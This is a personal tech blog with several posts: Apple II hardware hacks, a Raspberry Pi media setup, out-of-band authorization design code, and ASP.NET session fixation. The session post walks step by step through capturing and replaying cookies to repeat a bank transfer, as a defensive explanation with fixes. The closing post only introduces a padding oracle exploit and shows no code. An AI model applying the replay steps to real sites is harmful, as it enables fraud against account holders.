Explorations with Low-Powered Devices for the Apple IIe/IIgs

I recently posted about my experiences using a Bluetooth module to perform wireless ADTPro transfers with my Apple IIe.  At that time, I was powering the Bluetooth module from an AC adapter.

Seeing that the Bluetooth module's power adapter was a standard +5v USB power adapter, I had suggested a simple Apple II peripheral card with a female USB port to provide the +5v power needed by these modules or devices.  +5v is readily available from pin 25 on the slot connectors (a maximum of 500mA for all peripheral cards combined, according to the documentation).  A few minutes with the soldering iron produced this contraption:

AppleII-USB-5v-1 AppleII-USB-5v-2

It was clearly the work of an amateur, but it was enough for a proof of concept that let me put the Bluetooth module inside the Apple IIe without an additional power line coming out of the case.  And with that, I was again performing wireless ADTPro transfers from my laptop using Bluetooth.

AppleII-USB-5v-SerialBluetooth

One thing to note about this Bluetooth module is that its serial port speed is set to 9600 baud by default.  Recent versions of ADTPro have removed support for 9600 baud, so you'll have to follow the module's instructions to configure it to start up at 115,200 baud.  115,200 is faster anyway, and the serial transfer speed is still slower than the Bluetooth transfer speed (meaning the serial segment remains the slower part of an end-to-end transfer).

Moving to the IIgs, I pulled a tiny Wi-Fi bridge, the IOGear GWU627, out of my stash of devices.  It acts as a standard Wi-Fi bridge (802.11b, 802.11g, or 802.11n), except that it is very small and can be powered by a standard USB power adapter.  I put an Uthernet card in slot 2 and my homemade USB peripheral card in slot 3, and wired everything together, with the GWU627 bridge also inside the IIgs case.

IOGEAR-GWU627-1 AppleII-USB-5v-Uthernet-1

With a standard Marinetti installation, my IIgs is now wirelessly connected to my home network.  DHCP works over the wireless bridge, and the IIgs receives an IP address from the home router.  The Marinetti applications Casper web server and Telnet client work as they should.  This could be a good way to run a 24×7 web server from your IIgs and make it available to the Internet – of course, only with the proper port-forwarding rules in your home router and only if your ISP allows hosting a web server and does not block port 80 incoming to your network.

AppleII-USB-5v-Uthernet-2 AppleII-USB-5v-Uthernet-3


Adding Wireless (Bluetooth) Support in ADTPro

It’s been months since I planned to look into adding Bluetooth support in David Schmidt’s fabulous ADTPro software.  I’ve been using ADTPro for years to transfer disk images for use in my Apple IIe using the Apple II Super Serial Card.  Over the years, it has garnered many additional features, such as providing a virtual drive over the wires.

My Windows (8.1 x64) laptop does not have a built-in RS-232 serial port, so I normally use a cheap (~$15) USB-serial cable. One that works for my laptop, because of its Prolific PL-2303 chipset, is the StarTech ICUSB232DB25.  Coupled with a null modem adapter, I can use ADTPro at its maximum 115.2 kbps transfer speed.

Some time ago, I wanted to see if I could do away with the physical serial cable.  That was about 20 months back (I checked when I ordered the Bluetooth-Serial board and found an invoice from August 2012).  These Bluetooth-Serial boards cost about $20 each.  It's probably cheaper if you're willing to get just the Bluetooth-Serial module and wire it directly to the SSC data and power connectors.  However, this was just a proof of concept, so my setup looked like the following:

SuperSerialCardII BolutekBlutetoothModule

The Bluetooth-Serial board uses the Bolutek BLK-MD-BC04-B module (pictured on the lower right of the board).  It attaches to the SSC with a straight-through DB9-DB25 adapter, and uses the USB cable for the standard 5v power source.

Alas, at that time, my tests showed that although I could get wireless remote access to the Apple IIe, ADTPro did not fare as well.  Remote access was through Apple's PR#2 and IN#2 commands and Windows' HyperTerminal program.  Everything seemed to work properly on the Apple IIe end, but ADTPro's use of the COM ports exposed by the Bluetooth SPP service did not work for me (actually, it's the rxtx library's use of the COM ports – ADTPro just uses rxtx for serial port support).

I hatched a plan to update ADTPro to accommodate this.  After more than a year of getting de-prioritized, it finally got its due attention.  As of a few days ago, I have something like an alpha version of Bluetooth support working in ADTPro, tested only on Windows.

On the Windows end, any Bluetooth-enabled machine should work using the standard Windows Bluetooth drivers.  WIDCOMM-based Bluetooth controllers should also work.  I first had to pair my laptop with the Bolutek module.  Pairing is straightforward: with the Bolutek module in its regular slave-mode setting, it appears when I search for additional Bluetooth devices from my laptop, and the default pairing code is 1-2-3-4.  Once paired, you'll see that it provides the standard Bluetooth Serial Port Profile (SPP) and that virtual COM ports are created (COM17 and COM18 in my setup).

ADTProBluetooth-1

ADTProBluetooth-2 ADTProBluetooth-3

I put on my software developer hat, and dived into the ADTPro source code within the Eclipse IDE.  David has really gotten the components cleanly modularized, and I only had to create a few classes to add the Bluetooth support.  Once built, Bluetooth is just an additional transport in the ADTPro runtime environment.

ADTProBluetooth-4 ADTProBluetooth-5

The Bluetooth connection is made directly to the SPP service, and not through the virtual COM ports.  Once connected, the standard serial port client on the Apple IIe can send and receive disk images wirelessly over Bluetooth.

ADTProBluetooth-6

It was enough for a proof of concept, and I'll check with David about merging this upstream into ADTPro.  As with any proof-of-concept code, there's some cleanup work to do, like displaying the friendly names of the Bluetooth devices instead of their addresses.

Also, on the Apple IIe end, I could probably splice the power wire for the Bluetooth-Serial board and get the +5v directly from the Apple IIe motherboard.  With the inexpensive prototype boards selling around the net, I am also thinking of a generic USB power source slot card like this:

AppleUSBPowerProject

It’s probably just a two-wire setup.  I’m just not motivated enough to look for my soldering iron buried somewhere in the garage for the moment.  If anyone (Bradley?) wants to mass market such a board, I’m one of your potential buyers.

Update 5/16/2014:

I tried my ADTPro build on another machine.  This time, I first tried the virtual COM ports with the ADTPro Serial transport, and SURPRISINGLY, it works.  There may have been some changes in the rxtx library over the past 20 months, but I remember not getting it to work back then.

The serial port enumeration takes a while with these virtual COM ports, and it might seem like ADTPro is hanging, but just patiently wait for the dialog box to eventually come up, connect to the outgoing virtual COM port, and ADTPro works as it should.  Note that the baud rate you want to set on the ADTPro client is the baud rate of the communication from the Apple IIe to the Bluetooth board, not the baud rate from ADTPro to the virtual COM port.

So there. With other, maybe most, Windows machines or the proper Bluetooth stack, ADTPro correctly works using the rxtx library over the virtual COM ports exposed by the Bluetooth connection.  There’s no need for my ADTPro modifications (which I’ll just use in a separate follow-up project).


Updating my cable setup with the Raspberry Pi

I've delayed looking into the Raspberry Pi for quite some time now.  I've known how awesome it is, but I also knew that I didn't have a lot of time to tinker with it.  However, recent developments in late 2013 convinced me that I needed to spend time with this tiny computer.  Between the past holiday season and today, I have bought two Raspberry Pis, each with an enclosure, all the nifty tiny USB hardware that extends their functionality, and even a real-time-clock extension that attaches to the GPIO pins.

The things that convinced me to look into it are the developments related to cable TV (e.g., Comcast, Time Warner, FIOS).  There's this cable tuner, called the HD Homerun Prime, that you can purchase through the retail market.  Like TiVo devices, it takes in a CableCARD and attaches to your home router.  Cable providers are required by law to let you request a CableCARD if you have a subscription with them.  The first CableCARD is normally free, or sometimes they charge a minimal fee for it, like $1/month.

With this CableCARD and the HD Homerun Prime, your cable tuners (3 of them in the HD Homerun Prime) are made available to your home network through DLNA/UPnP.  The HD Homerun Prime gained this UPnP capability in a firmware update in late 2013.

We have a room in our house that doesn't have a cable outlet.  Coincidentally, we have a combo TV/DVD there.  The only way we could get cable to that TV was with a low-tech A/V sender/receiver that uses some RF frequency – the kind that is highly susceptible to microwave interference (that is, the A/V signal craps out when the microwave is in use).

In 2013, media center usage of the Raspberry Pi took a dramatic upturn.  First, a per-unit license for MPEG2 decoding was made available for a low price of £2 (about $4).  A lot of cable providers encode their streams as MPEG2 (while I think most dish providers use MPEG4).  Another development was that CEC capability was enabled on the Raspberry Pi's HDMI socket.  With that, the media center distributions for the Raspberry Pi, like RaspBMC and OpenElec, provided all that I needed to switch over to a full UPnP solution for my isolated TV.

I installed the OpenElec distribution image.  It's smaller and customized for a lean media center, so a lot of software packages are not present.  But that's why I bought another Pi just for general-purpose tinkering and relegated the first Pi to my isolated TV.  OpenElec easily fits on a small-capacity SD card; I used a 2GB SD card.  I attached a nano-sized WiFi USB dongle (150Mbps), temporarily hooked up a USB keyboard/mouse, and connected the HDMI port to our main TV for testing.

OpenElec boots directly into XBMC.  There are several XBMC skins out there to customize its appearance, but I just stuck with the standard out-of-the-box skin “Confluence”.  First thing I noticed is that the HD Homerun Prime is detected as a UPnP source.  So I added the Favorites subfolder as an XBMC video source.  I’ve pre-selected the channels that would appear in the HD Homerun Prime Favorites subfolder through the small web interface exposed by the HD Homerun Prime, the same web interface where you can read the codes off when you set it up with your cable provider over the phone with their tech support.  I set up the Favorites so I could see a list of channels shorter than the full list of channels available to me.  Who watches those home shopping channels anyway?

The Raspberry Pi feature that caught me by surprise is the CEC capability.  With CEC, I actually didn't even need a temporary USB keyboard/mouse to set up OpenElec.  The cursor-movement buttons on most modern TV remotes are received by the TV's infrared receiver and passed through the HDMI cable using this CEC feature.  The device at the other end of the HDMI cable, which is the Raspberry Pi, receives the cursor movements and uses them to navigate the XBMC interface.

One hiccup was that when I moved the setup over to the isolated TV, I found that my small TV/DVD device didn't have the CEC feature.  It was a no-brand small 22” LCD TV, and from what I've read, some older and smaller TVs do not have CEC.  So what's available as a remote control for OpenElec/XBMC?  I didn't want a full keyboard/mouse because it felt too geeky.

First, I tried Bluetooth and it worked.  I had a tiny Bluetooth USB dongle which the Pi readily recognized.  From OpenElec’s Bluetooth setting, I was able to pair an extra Wiimote controller that we have.  I tried pairing a no-name Wiimote clone, but it would only recognize the four cursor keys.  With an original Nintendo Wiimote, it was able to recognize the cursor keys, Enter and Cancel keys, and even the volume keys.  So that would have worked, but using a Wiimote still felt geeky.

I read that certain inexpensive RF remote controls (the ATI All-in-Wonder remotes) would work and wouldn't cost more than $15; I also read that most media center IR remotes would work and are actually less expensive.  In the end, I decided I wanted to use the existing remote control from that no-brand TV.  I ended up buying a Flirc, sort of a universal learning IR receiver.  The Raspberry Pi easily recognized the Flirc dongle, and I was able to program/teach the dongle with the TV remote using the Windows application available from their site – very easily, too.  I had to pick a remote button that the TV would not recognize; I picked the “Guide” button and had it mapped to send a “Ctrl-Home” keyboard equivalent to the Raspberry Pi.  In the XBMC keyboard layout on the Raspberry Pi (I had to use SSH or the command line to do this), I added a mapping so that Ctrl-Home brings up the mapped HD Homerun Prime Favorites source.  The result is that the “Guide” button on the remote serves as a go-back-to-the-top-level-menu command, and with the arrow keys on the remote, you can scroll through and select from your favorite channels.

With the UPnP streaming, I could even access my cable channels (each of the 3 tuners is reserved as it is accessed) through UPnP players on any of our phones, tablets, or computers.  On Windows, you can easily see the HD Homerun Prime as a UPnP device and browse through the Favorites folder (it plays the cable channel in Media Player).  For Android devices, I use the combination of Skifta and WonderPlayer.

I opted to use the SD channels because the streams go over the wireless network.  I've heard that HD channels, although possible, could put a strain on your wireless network.  Streaming HD channels to the Pi should not be an issue over a wired network, though.  Also, I've yet to set up a new 802.11ac router to see if it provides enough bandwidth to switch my setup over to HD.

I'm now ready to return my cable box to my cable provider and save the $10-something they charge me monthly for it.  I will miss the DVR capability for now (also an additional $10-something per month that they charge), but I have also set up a small Windows media center box to be my DVR.  I've yet to see if I can configure Windows and/or the motherboard to allow the media center to sleep and wake on demand without needing Wake-on-LAN software to explicitly wake it up.  I've tested it with WOL, but I really want it to wake automatically when something else on the home network makes a request to any of its services.  Having that media center setup also means I could make it host the electronic program guide accessed by my isolated TV.  But that media center setup is another story.

If only the HD Homerun Prime had an additional HDMI socket to directly connect one of the TVs that sit close to it.  But I’m not complaining.


Video options for the Apple IIgs

I've always abhorred CRT monitors.  They're bulky and heavy, and they probably emit enough radiation to tire your eyes quickly.  I'm so thankful that the computer industry, and every other video-related industry, has switched over to LCDs.

Retrocomputing is a hobby of mine.  The Apple IIgs is what I use the most from my collection of vintage computers.  The Apple IIgs uses an RGB monitor connected through a DB-15 connector at the back of the computer.  A few years ago, Roger Johnstone provided the schematics for an RGB-SCART cable.  With some LCD monitors having a SCART input, this allowed me to finally get rid of my RGB monitor.  I use a Samsung 730MW monitor, and it provides a very clear picture from my Apple IIgs.

LCD monitors with SCART input could get harder to find in the coming years, so I wanted to look at alternatives for displaying my Apple IIgs output on modern monitors.  It's been an often-discussed topic in the vintage computer forums.  Ideally, we'd like to be able to use VGA, DVI, or even HDMI-capable monitors (composite-based output would be insufficient for me). For several years, Roger's SCART cable was the only inexpensive way to do this.  There was a more expensive XRGB/XRGB2 converter that provided good output quality, but it costs more than the typical Apple IIgs investment itself.

As recently as last year, Nishida Radio from Japan began offering an RGB-Component converter.  I recently purchased the converter from him and got a chance to test it over the holidays.  Although I wouldn't call the output equivalent to that of the SCART cable, it's pretty darn close.  Look for yourself in the following photos I've taken.  My monitor has both a SCART connector and a Component-In connector.

P1040235P1040238

P1040245P1040239

The ones on the left use the SCART cable and the ones on the right use Nishida’s RGB-Component adapter.

Nishida also has some other components for use with vintage computers.  My other purchases include the UNISDISK which emulates a Unidisk drive (attaches to the DB-19 drive connector at the back of the Apple IIgs), and a VGA adapter for the Apple IIc.  See all his stuff here.


Out-of-band Authorization

A lot of applications require an in-session authorization mechanism. This means that when an end-user is within an authenticated session, the end-user is prompted to enter a set of credentials before being allowed to perform specific transactions. These transactions are identified as high-risk transactions, such as changing a password or changing a registered e-mail address. The set of requested credentials could be the same set used to sign in to the application (which is confusingly often mislabeled as re-authentication), or it could be a different set of credentials specific to the transaction being requested.

Almost all the time, this in-session authorization mechanism is meant to be delivered or performed out-of-band. That is, the secondary credentials are either delivered over, or entered through, a channel different from the one where the transaction was initiated.

I’m specifically addressing the general concept of authorization, instead of the more specific concept of authentication. In the context of using an out-of-band mechanism for authorization, if we identify that high-risk transaction to be the “signing-in” transaction, then the mechanism leads to what is known in the industry as multi-factor authentication.

Multi-factor authentication (MFA) is available in a lot of applications. However, because MFA is a specialization of the more general concept of out-of-band authorization (OOBA), there are scenarios that MFA does not take into account during application design. These scenarios, if not accounted for, often lead to an insecure implementation of a general OOBA mechanism.

High-risk Transaction Identification

The first step in an OOBA mechanism is to identify if a transaction is a high-risk transaction. Most of the time, just the transaction name itself is enough to identify it as high-risk. An example is the password change transaction.

There are times when identification depends on the payload of the transaction request. An example would be an ATM withdrawal where withdrawing less than a certain threshold is not considered high-risk, and withdrawing above that threshold is considered high-risk. In this case, the transaction request has to be inspected to determine whether it is high-risk or not. This has implications for application design because the application cannot prompt for secondary credentials before the user has even entered the transaction request details.
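
As a rough illustration of payload-dependent identification (a sketch only; the WithdrawalRequest type and the threshold value are hypothetical), the check might look like:

// Hypothetical request type and threshold, for illustration only.
public class WithdrawalRequest
{
    public string AccountId { get; set; }
    public decimal Amount { get; set; }
}

public static class RiskPolicy
{
    private const decimal HighRiskThreshold = 500m;  // assumed threshold

    // The transaction name alone is not enough here; the payload has to be
    // inspected before deciding whether to prompt for secondary credentials.
    public static bool IsHighRisk(WithdrawalRequest request)
    {
        return request.Amount >= HighRiskThreshold;
    }
}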

Transaction and Authorization Context

An important part of OOBA is the association of the authorization context with that of the transaction context. Before a transaction is allowed to go through, the authorization context associated with the transaction should be verified. It is not enough to verify just any authorization context; it has to be the authorization context associated with the transaction.

If the authorization context is verified in a separate operation from the transaction itself, it is very important that the context association be maintained. That is, it is not enough to ask a verification service, "Are these the correct credentials?" We have to ask the verification service, "Are these the correct credentials for this particular transaction request?"

In a web application, in order for the context association to be maintained, the transaction request and the secondary credentials should be sent in a single HTTP request. Technically, separate HTTP requests could be used, but that would require a mechanism for associating the separate requests with each other.
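
A minimal sketch of what that question looks like as a server-side interface (the types below are placeholders, not from any particular framework):

// Placeholder shapes for a transaction request and its secondary credentials.
public class TransactionRequest
{
    public string Name { get; set; }     // e.g., "ChangePassword"
    public string Payload { get; set; }  // serialized transaction details
}

public class AuthorizationCredentials
{
    public string OneTimeCode { get; set; }
}

public interface IAuthorizationVerifier
{
    // Answers "are these the correct credentials for THIS transaction?",
    // not merely "are these valid credentials?".
    bool Verify(TransactionRequest transaction, AuthorizationCredentials credentials);
}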

Design Notes

Web Forms

Out-of-band authorization can be implemented in web forms through a user control embedded in the form. The OOBA user control visibility can be toggled depending on the position of a transaction within a workflow. For the most common type of OOBA, the user control merely provides entry fields where OOBA secondary credentials are entered.

Server-side validation of the transaction request and the OOBA credentials occurs within a single HTTP request before the transaction is completed.

authzValidationNeeded = … depending on the transaction request payload …
if (authzValidationNeeded)
    authzCredentials = … retrieved from form fields …
    if (Empty(authzCredentials) || !Validate(authzCredentials))
    then
        return an authz error,
        allow the user to re-enter credentials,
        and resubmit the transaction and credentials
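
As a rough code-behind sketch of that flow (AuthzControl, BuildTransactionRequest, IsHighRisk, ValidateAuthorization, and ExecuteTransaction are hypothetical members, reusing the TransactionRequest shape sketched earlier):

// The transaction and the OOBA credentials arrive in the same postback,
// so the authorization stays tied to this specific request.
protected void SubmitButton_Click(object sender, EventArgs e)
{
    var request = BuildTransactionRequest();   // built from the transaction form fields

    if (IsHighRisk(request))
    {
        string credentials = AuthzControl.EnteredCredentials;

        if (string.IsNullOrEmpty(credentials) || !ValidateAuthorization(request, credentials))
        {
            // Authz error: let the user re-enter credentials and resubmit
            // the transaction together with them.
            AuthzControl.ShowError("Authorization failed. Please re-enter your code.");
            return;
        }
    }

    ExecuteTransaction(request);
}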

Because of the importance of associating the authorization context with the transaction, the authorization context should not be validated in a separate, earlier step (a separate, earlier HTTP request) from the transaction itself.

MVC Forms

The authorization token follows the same approach as the built-in MVC AntiForgery mechanism: it is passed to the server as a separate form field. It differs only in that the token value is not generated at the time the view is generated; instead, the form field is made visible and the user is asked to input the value.

Server-side validation of the transaction request is the same as that in Web Forms.
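
One possible server-side shape is an action filter that pulls the token from the form field and validates it against the incoming request; the form field name and the AuthorizationService helper below are assumptions, not the AntiForgery API:

using System.Web;
using System.Web.Mvc;

// Sketch of an MVC action filter for OOBA validation. The token travels as a
// form field (in the same spirit as the AntiForgery token), but its value is
// typed in by the user rather than generated with the view.
public class RequireOobAuthorizationAttribute : ActionFilterAttribute
{
    public override void OnActionExecuting(ActionExecutingContext filterContext)
    {
        HttpRequestBase request = filterContext.HttpContext.Request;
        string token = request.Form["AuthorizationToken"];  // hypothetical field name

        if (string.IsNullOrEmpty(token) || !AuthorizationService.Validate(request, token))
        {
            filterContext.Result = new HttpStatusCodeResult(403, "Authorization required");
        }
    }
}

// Placeholder for whatever verifies the credentials against this request.
public static class AuthorizationService
{
    public static bool Validate(HttpRequestBase request, string token)
    {
        return false;  // a real implementation checks the token against the transaction
    }
}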

WCF Ajax Services

WCF Ajax services pose an implementation challenge because, in a general architectural design, we want to separate the concerns of authorization from those of the transaction. If we require the transaction interface to be modified to accommodate the authorization credentials, like:

FooResponse FooOperation(FooRequest request, AuthorizationCredentials credentials)

Then authorization concerns interfere with the clean operation interface of the transaction.

Since it is desired to pass the authorization credentials in the same HTTP request as the transaction, the only other place we can pass them is in the HTTP headers.

Server-side validation of the transaction request and the OOBA credentials occurs within a single HTTP request before the transaction is completed.

authzValidationNeeded = … depending on the transaction request payload …
if (authzValidationNeeded)
    authzCredentials = … retrieved from HTTP header …
    if (Empty(authzCredentials) || !Validate(authzCredentials))
    then
        return an authz error,
        allow the user to re-enter credentials,
        and resubmit the transaction and credentials
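
On the service side, a sketch of reading the credentials from the incoming header could look like the following; FooRequest, FooResponse, and the private helpers are placeholders, and the header name matches the one used by the client script further below:

using System.ServiceModel;
using System.ServiceModel.Web;

public class FooRequest { public string Payload { get; set; } }
public class FooResponse { public string Result { get; set; } }

// Sketch of a WCF Ajax service that keeps the operation signature clean and
// reads the OOBA credentials from an HTTP header instead.
[ServiceContract(Namespace = "")]
public class FooService
{
    [OperationContract]
    public FooResponse FooOperation(FooRequest request)
    {
        string credentials =
            WebOperationContext.Current.IncomingRequest.Headers["X-RequestAuthorizationToken"];

        if (RequiresAuthorization(request) &&
            (string.IsNullOrEmpty(credentials) || !ValidateAuthorization(request, credentials)))
        {
            // Authz error: the client re-prompts for credentials and resubmits
            // the transaction together with them.
            throw new FaultException("Authorization required.");
        }

        return Execute(request);
    }

    // Placeholders for payload inspection, credential verification, and execution.
    private bool RequiresAuthorization(FooRequest request) { return true; }
    private bool ValidateAuthorization(FooRequest request, string credentials) { return false; }
    private FooResponse Execute(FooRequest request) { return new FooResponse(); }
}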

On the client side, the transaction invocation is conventionally done through JavaScript. The invocation would originally look like:

IFooService.FooOperation(fooRequest,
    Function.createDelegate(this, this.onFooOperationSuccess),
    Function.createDelegate(this, this.onFooOperationFailure),
    fooContext);

If the transaction is identified as high-risk, the invocation should be changed to present the authorization credentials form and to invoke the service operation only after the credentials have been entered, like:

authzWidget.show(this, fooRequest, fooContext,
    function (that, request, context, credentials) {
        IFooService.FooOperation(request,
            Function.createDelegate(that, that.onFooOperationSuccess),
            Function.createDelegate(that, that.onFooOperationFailure),
            {
                context: context,
                credentials : credentials
            });
    });

Or like (using jQuery’s proxy instead of Microsoft Ajax’s delegate):

authzWidget.show(this, fooRequest, fooContext,
    function (that, request, context, credentials) {
        IFooService.FooOperation(request,
            $.proxy(that.onFooOperationSuccess, that),
            $.proxy(that.onFooOperationFailure, that),
            {
                context: context,
                credentials : credentials
            });
    });

The Microsoft Ajax WebRequestManager is hooked to check for the presence of the credentials in the invocation context and to send them as part of the HTTP headers.

Sys.Net.WebRequestManager.add_invokingRequest(function (sender, eventArgs) {
    var webRequest = eventArgs.get_webRequest();
    var userContext = webRequest.get_userContext();
    if (typeof userContext == "object" && userContext.credentials) {
        var headers = webRequest.get_headers();
        headers["X-RequestAuthorizationToken"] = userContext.credentials;
    }
});

Additional Notes

Slightly related to the implementation design above, let me explain my claim that authentication is an extension to authorization. Authorization is the core process. I understand that this is highly controversial. I’ll start by qualifying that there are two kinds of authorization — an authenticated authorization and an unauthenticated authorization. Most developers are familiar with the former wherein the identity of the caller is part of the context used to determine whether or not a transaction is authorized. What about an unauthenticated authorization? What is it and when is it used?

An unauthenticated authorization is when there is no separate identity context that can be used to determine authorization. Only the information or credentials that are included in the authorization request are used to determine authorization. What transaction would use such an unauthenticated authorization? It would be THE transaction that creates the identity context. In short, the sign-in transaction.

Think about that. In the most common case, an end-user provides a username and password to authorize the creation of an identity context. That identity context is usually a token or cookie that is passed around during the lifetime of a session to perform additional authenticated authorizations. Extending this concept further, MFA is just a means of aggregating multiple unauthenticated authorizations, with the end result of "signing in" and creating an identity context.

What about the term “re-authentication”? Re-authentication is when the identity context needs to be re-established, perhaps because it was lost, it expired, or it was explicitly revoked. Re-authentication can use the same means as the sign-in process — username/password, MFA, etc. Until the end-user re-authenticates, he doesn’t have an identity context and cannot perform any authenticated authorizations.

A "password reset" flow is just another channel to perform an unauthenticated authorization to establish an identity context; of course, once the identity context has been established, the system requires the end-user to set a new password.

End-users sometimes confuse re-authentication with general authorization. This is because some applications request the same set of credentials as those used to sign in. It is not re-authentication, however, because the existing identity context remains valid. Take, for example, the popular eBay web site. You sign in to establish an identity context. Within the application, if you want to edit your account information, you are prompted again for username/password. You can cancel that transaction (editing your account information), back out, and your original identity context is still valid as you move somewhere else in the application. What the site was doing was authorizing the transaction to edit account information, not re-authenticating. It just so happens that the authorization process asked for username/password. The authorization process could have used a different mechanism, such as challenge questions/answers, or an out-of-band mechanism like SecurID.


ASP.NET Session and Forms Authentication

The title can be misleading, because in concept, one is not related to the other.  However, a lot of web applications mix them up, causing bugs that are hard to troubleshoot, and, at worst, causing security vulnerabilities.

A little bit of background on each one.  ASP.NET sessions are used to keep track of and store information related to a "user" session.  When a web server is initially accessed by a browser, the server generates a unique session ID and sends that session ID to the browser as the value of a cookie (the name of the cookie is ASP.NET_SessionId).  Along with that session ID, a dictionary of objects on the server, often referred to as session state, is allocated corresponding to that session ID.  This dictionary can be used to keep track of information unique to that session.  For example, it could be used to keep track of items placed in a shopping cart.

Note that this “session” can exist even if the user has not authenticated.  And this is often useful.  In a retail web site (like Amazon), you can put items in your shopping cart, and only need to authenticate or sign on when you are ready to checkout — and even then, you can actually make a purchase without needing to authenticate, provided, of course, that a valid credit card is used.

Because this “session” is disjoint from authentication, it is better referred to as a “browser” session instead of as a “user” session.  In a kiosk environment, if a user walks away from the kiosk while there are items in a shopping cart, the next user to use the kiosk will still see the same shopping cart.  The web server doesn’t know any better that a different user is using the kiosk, because the same session ID is being sent back in the session cookie during interaction with the web server.

That dictionary of objects on the server, the session state, also poses certain complications that most developers are aware of.  In a web farm, some form of sticky load balancer has to be used so that session state can be kept in memory.  Or a centralized store for the session state is used to make the state consistent across the servers in the web farm.  In either case, service performance can be affected.  I have a very strong opinion against using session state.  I avoid it, if at all possible.

What about Forms Authentication?  Forms Authentication is the most common authentication mechanism for ASP.NET web sites.  When a user is authenticated, most commonly using a user ID and password, a Forms Authentication cookie is generated and is sent to the browser (the name of the cookie, by default, is .ASPXAUTH).  The cookie contains the encrypted form of an authentication ticket that contains, among other things, the user ID that uniquely identifies the user.  The same cookie is sent to the web server on each HTTP request, so the web server has an idea of the user identity to correlate to a particular HTTP request.

Everything I mentioned above is common knowledge for web developers.  Trouble and confusion come about only when one expects that an ASP.NET session can be associated with ASP.NET authentication.  To be clear, it can be done, but precautionary measures have to be taken.

The problem is related to session hijacking, but it is better known as session fixation.  Assuming that you've done your due diligence of using SSL/TLS and HttpOnly cookies, there isn't a big risk of having the session ID stolen/hijacked by sniffing the network.  And most applications also perform some session cleanup when the user logs out.  Some applications even ensure that a new session ID is created when the user logs in, thinking that this is enough to correlate a session state with a user identity.

Remember that the session cookie and the forms authentication cookie are two different cookies.  If the two are not synchronized, the web server could potentially allow or disallow some operations incorrectly.

Here's a hypothetical (albeit unrealistic) scenario.  A banking application puts a savings account balance into session state once the user logs in.  Perhaps it is computationally expensive to obtain the account balance, so to improve performance, it is kept in session state.  The application ensures that a new session ID is created after the user logs in and clears the session state when the user logs out.  This is meant to prevent one user from reusing the session state of another user.  Does it really prevent it?  No.

As an end-user having control of my browser, I am privy to the traffic/data that the browser receives.  With the appropriate tools, like Fiddler2 or Firebug, I can see the session and forms authentication cookies.  I may not be able to tamper with them (e.g., the forms authentication cookie is encrypted and hashed to prevent tampering), but I can still capture them and store them for a subsequent replay attack.

In the hypothetical banking application above, I initially log in and get SessionIDCookie1 and FormsAuthCookie1.  Let's say the account balance stored in session state corresponding to SessionIDCookie1 is $100.  I don't log out, but open up another window/tab and somehow prevent (through Fiddler2, maybe) the cookies from being sent through the second window.  I log in to that second window.  The web server, noting that the request from the second window has no cookies, starts off another session state, and also returns SessionIDCookie2 and FormsAuthCookie2.  Browsers usually overwrite cookies with the same names, so SessionIDCookie2 and FormsAuthCookie2 are my new session ID and forms authentication cookies.  But remember that I captured SessionIDCookie1 and FormsAuthCookie1 to use in a future attack.

In that second window, I transfer $80 away from my account, thereby updating the session state corresponding to SessionIDCookie2 to be $20.  I cannot make another $80 transfer in the second window because I do not have sufficient funds.

Note that SessionIDCookie1 has not been cleaned up and there is a session state on the server corresponding to SessionIDCookie1 which still thinks that the account balance is $100.  I now perform my replay attack, sending to the web server SessionIDCookie1 and FormsAuthCookie1.  For that given session state, I can make another $80 transfer away from my account.

You might say that the application could easily keep track of the forms authentication cookie issued for a particular user, so that when FormsAuthCookie2 is issued, FormsAuthCookie1 becomes invalid and will be rejected by the server.  But what if I use SessionIDCookie1 and FormsAuthCookie2 on the second window?  It’s the same result — I can make another $80 transfer away from my account.

Oh, you might say that the application should invalidate SessionIDCookie1 when SessionIDCookie2 is issued.  Sure, but how?  Unlike the forms authentication cookies, where the user identity is the same within both cookies, there is nothing common between SessionIDCookie1 and SessionIDCookie2.  And since there is nothing relating SessionIDCookies with FormsAuthCookies, there’s no mechanism to search for and invalidate SessionIDCookie1.

The only workaround for this is custom code that ties a SessionIDCookie with the FormsAuthCookie that was issued for the same logical session.  One of the following options should provide a solution.

  • Key your session states by an authenticated user ID instead of by a session ID.  No need for the session cookie.  This will not work for applications that need to keep track of session without authentication (e.g., online shopping).
  • Store the session ID as part of the payload of the forms authentication cookie.  Verify that the session ID in the session cookie is the same as that stored in the forms authentication cookie.  Keep track of the forms authentication tickets issued for each user so that only a single forms authentication cookie (the most recently issued) is valid for the same user.  A sketch of this option follows below.
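
A minimal sketch of the second option, using the standard FormsAuthentication APIs (the per-user tracking of the most recently issued ticket is left out):

using System;
using System.Web;
using System.Web.Security;

public static class SessionBoundFormsAuth
{
    // Issue the forms authentication cookie with the current session ID stored
    // in the ticket's UserData, tying the two cookies together.
    public static void IssueTicket(HttpContext context, string userName)
    {
        var ticket = new FormsAuthenticationTicket(
            1,                                // version
            userName,
            DateTime.Now,
            DateTime.Now.AddMinutes(30),
            false,                            // not persistent
            context.Session.SessionID);       // bind to the current session

        var cookie = new HttpCookie(FormsAuthentication.FormsCookieName,
                                    FormsAuthentication.Encrypt(ticket))
        {
            HttpOnly = true,
            Secure = FormsAuthentication.RequireSSL
        };
        context.Response.Cookies.Add(cookie);
    }

    // Called on each authenticated request (e.g., from a module or base page)
    // to verify that the session cookie still matches the one bound to the ticket.
    public static bool IsSessionBoundToTicket(HttpContext context)
    {
        HttpCookie cookie = context.Request.Cookies[FormsAuthentication.FormsCookieName];
        if (cookie == null) return false;

        FormsAuthenticationTicket ticket = FormsAuthentication.Decrypt(cookie.Value);
        return ticket != null && ticket.UserData == context.Session.SessionID;
    }
}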

Maybe an overarching solution is to avoid storing user-specific information in the session state.  Remember that it is a “browser” session state, and has nothing to do with an authenticated user.  If you keep that in mind and only store “browser”-related information into session state, then you could avoid the problems altogether.

ASP.NET session fixation is not a very publicized problem, but it is potentially a big risk, especially if improper assumptions are made with regard to session and authentication.  ASP.NET session fixation was also described some time ago at http://software-security.sans.org/blog/2009/06/14/session-attacks-and-aspnet-part-1/, and it has been reported through Microsoft Connect at http://connect.microsoft.com/feedback/viewfeedback.aspx?FeedbackID=143361, but to my knowledge, it has not been addressed within the ASP.NET framework itself.


Yet Another Take on the Padding Oracle Exploit Against ASP.NET

Or an example Padding Oracle attack in 100 lines of C# code.

This post has been in my outbox for weeks, since I did not want to make it generally available before the patches were released.  Now that the patches are being pushed on Windows Update, and I also see that there are a couple of blog entries already providing the same details, I hope that making the source available would help developers understand how the exploit worked.

